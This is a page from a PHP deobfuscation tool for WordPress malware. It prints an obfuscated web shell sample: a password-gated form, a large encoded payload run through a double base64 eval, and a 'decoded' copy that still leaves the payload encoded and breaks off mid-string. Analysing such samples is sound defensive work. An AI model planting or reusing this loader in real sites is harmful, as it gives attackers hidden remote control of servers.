Japanese English

PHP deobfuscation, decryption, reconstruction tool

De-obfuscate PHP malware/viruses and tampering code on Wordpress to original readable code.

*Please note that not all obfuscation codes can be decoded.

Decoded the code below.

<?php if (function_exists('session_start')) { session_start(); if (!isset($_SESSION['secretyt'])) { $_SESSION['secretyt'] = false; } if (!$_SESSION['secretyt']) { if (isset($_POST['pwdyt']) && hash('sha256', hash('sha256',$_POST['pwdyt'])) == 'f5905ab47b8b716f09bce4a6c0d5e5cb3db2ce8da38c3...



Obfuscated php code

<?php
if (function_exists('session_start')) {
  session_start();
  if (!isset($_SESSION['secretyt'])) {
    $_SESSION['secretyt'] = false;
  }
  if (!$_SESSION['secretyt']) {
    if (isset($_POST['pwdyt']) && hash('sha256', hash('sha256',$_POST['pwdyt'])) == 'f5905ab47b8b716f09bce4a6c0d5e5cb3db2ce8da38c3c271f1e69b0a587c76e') {
      $_SESSION['secretyt'] = true;
    } else {
$bytesecform = <<<FORM
<html>
  <head>
    <meta charset="utf-8">
    <title></title>
    <style type="text/css">
      body {padding:10px}
      input {
        padding: 2px;
        display:inline-block;
        margin-right: 5px;
      }
    </style>
  </head>
  <body>
    <form action="" method="post" accept-charset="utf-8">
      <input type="password" name="pwdyt" value="" placeholder="passwd">
      <input type="submit" name="submit" value="submit">
    </form>
  </body>
</html>
FORM;
      die($bytesecform);
    }
  }
}
?><?php null; $ULTRA = "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"; @eval(base64_decode(base64_decode("\x57\x6c\x68\x61\x61\x47\x4a\x44\x61\x48\x70\x6b\x53\x45\x70\x6d\x59\x32\x30\x35\x4d\x45\x31\x55\x54\x57\x39\x61\x4d\x33\x42\x77\x59\x6d\x31\x61\x63\x31\x6c\x59\x55\x6d\x78\x4c\x52\x32\x51\x32\x59\x56\x63\x31\x62\x57\x4a\x48\x52\x6a\x42\x61\x55\x32\x68\x75\x5a\x57\x35\x57\x64\x56\x6b\x79\x4f\x58\x52\x6a\x53\x45\x70\x73\x59\x7a\x4e\x4e\x62\x31\x6c\x74\x52\x6e\x70\x61\x56\x46\x6b\x77\x57\x44\x4a\x53\x62\x46\x6b\x79\x4f\x57\x74\x61\x55\x32\x64\x72\x56\x6c\x56\x34\x56\x56\x56\x72\x52\x58\x42\x4c\x55\x32\x74\x77\x53\x31\x4e\x72\x4e\x77\x3d\x3d"))); exit();

Decoded(de-Obfuscated) php code

<?php

if (function_exists('session_start')) {
    session_start();
    if (!isset($_SESSION['secretyt'])) {
        $_SESSION['secretyt'] = false;
    }
    if (!$_SESSION['secretyt']) {
        if (isset($_POST['pwdyt']) && hash('sha256', hash('sha256', $_POST['pwdyt'])) == 'f5905ab47b8b716f09bce4a6c0d5e5cb3db2ce8da38c3c271f1e69b0a587c76e') {
            $_SESSION['secretyt'] = true;
        } else {
            $bytesecform = <<<FORM
<html>
  <head>
    <meta charset="utf-8">
    <title></title>
    <style type="text/css">
      body {padding:10px}
      input {
        padding: 2px;
        display:inline-block;
        margin-right: 5px;
      }
    </style>
  </head>
  <body>
    <form action="" method="post" accept-charset="utf-8">
      <input type="password" name="pwdyt" value="" placeholder="passwd">
      <input type="submit" name="submit" value="submit">
    </form>
  </body>
</html>
FORM;
            die($bytesecform);
        }
    }
}
null;
$ULTRA = "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